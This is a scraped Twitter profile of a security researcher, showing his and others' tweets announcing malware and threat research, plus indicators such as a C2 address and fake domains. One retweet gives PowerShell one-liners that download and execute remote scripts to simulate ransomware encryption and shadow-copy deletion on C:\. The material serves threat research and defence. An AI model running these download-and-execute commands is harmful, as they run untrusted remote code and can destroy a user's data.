Nadav Lorber (@lnadav)'s Twitter Profile
Nadav Lorber

@lnadav

Security Researcher & Team Leader @Morphisec | Ex. IronSource & Verint

ID: 388286510

Joined: 10-10-2011 14:09:50

102 Tweets

495 Followers

202 Following

Hido Cohen (@0xhido):


A new infection chain we see a lot lately is used to deliver popular malware families

Read my technical analysis of the new #SYK #Crypter and its Discord loader at blog.morphisec.com/syk-crypter-di…

VT Collection: virustotal.com/gui/collection…
Michael Gorelik (@smgoreli):

working on my new simulator:

IEX (New-Object Net.WebClient).DownloadString("raw.githubusercontent.com/smgorelik/Rans…"); Invoke-ShadowDeleteSIM -Mode All -Volume 'C:\'

IEX (New-Object Net.WebClient).DownloadString("raw.githubusercontent.com/smgorelik/Rans…"); Invoke-RansomSIM -Mode Encrypt -Path 'C:\'

Itay Cohen 🌱 (@megabeets_):

Excited to share our latest research in which we detail a targeted Chinese espionage operation against defense institutes in Russia. The attacks, attributed to a group we call #TwistedPanda, deploy a multi-layered loader and a backdoor dubbed SPINNER. research.checkpoint.com/2022/twisted-p… 🧵>>

Arnold Osipov (@osipov_ar):


Hido Cohen and I recently discovered new changes in the #Donot #APT (AKA #APT-C-35) toolset.
Moreover, the team used a nice trick to evade the scanning of the remote template by checking if the User-agent contains “MSOffice”.
More info: blog.morphisec.com/apt-c-35-new-w…
Jazi SKII
Nadav Lorber (@lnadav):

#ProxyShellMiner - An ongoing campaign that propagates within enterprise networks by exploiting Windows Exchange servers for initial access. Read more about it here: blog.morphisec.com/proxyshellmine…

Nadav Lorber (@lnadav):


Introducing #SYS01 #Stealer - an advanced stealer, packed with multiple stages in Rust, Python, and PHP for evading security solutions. Similar to the recent #S1deload campaigns. Thx to Arnold Osipov for this research.
Read more here: blog.morphisec.com/sys01stealer-f…
Arnold Osipov (@osipov_ar):


Ongoing #in2al5dp3in4er (invalid printer) loader delivering #Aurora stealer from a #MidJourney themed website.
Still #FUD on VirusTotal - 0 detections!

C2: 94.142.138[.]218:4561
Fake websites:
midj0urney[.]org
get.mid-journey[.]org/?gclid

More info - blog.morphisec.com/in2al5d-p3in4er
Nadav Lorber (@lnadav):

Our new research is one of our best publications in recent years, if you are interested in the malware & threat domain it's a must-read!

Morphisec (@morphisec):


Throughout the year, Morphisec has learned much about the Chae$ 4 malware variant.

On October 18th, our team will help you understand what is new and how it can impact your business.

Reserve your spot at our 45-minute interactive webinar here: bit.ly/3PJOEPE!
Virus Bulletin (@virusbtn):

Morphisec's Nadav Lorber analyses ResolverRAT, a newly identified remote access trojan that combines advanced in-memory execution, API and resource resolution at runtime, and layered evasion techniques. morphisec.com/blog/new-malwa…

Nadav Lorber (@lnadav):

By 'implementing a waitlist' all they did was remove the installer download link from their site 🙄 You can just get the installer from other sources and first-time login will activate it! I'd expect more from AWS 😂

Krakovia (@krakovia_evm):


someone deployed a malware extension for Cursor but seems he forgot to delete promotional messages and the clear-text payload lol
extra loot: download booster script
vx-underground (@vxunderground):

One way to differentiate a real nerd from a phony nerd is their appreciation of stuff.

For example, someone may share an idea, or proof-of-concept, which illustrates something which is unusual.

A nerd will appreciate it for its documentation and appreciation that someone has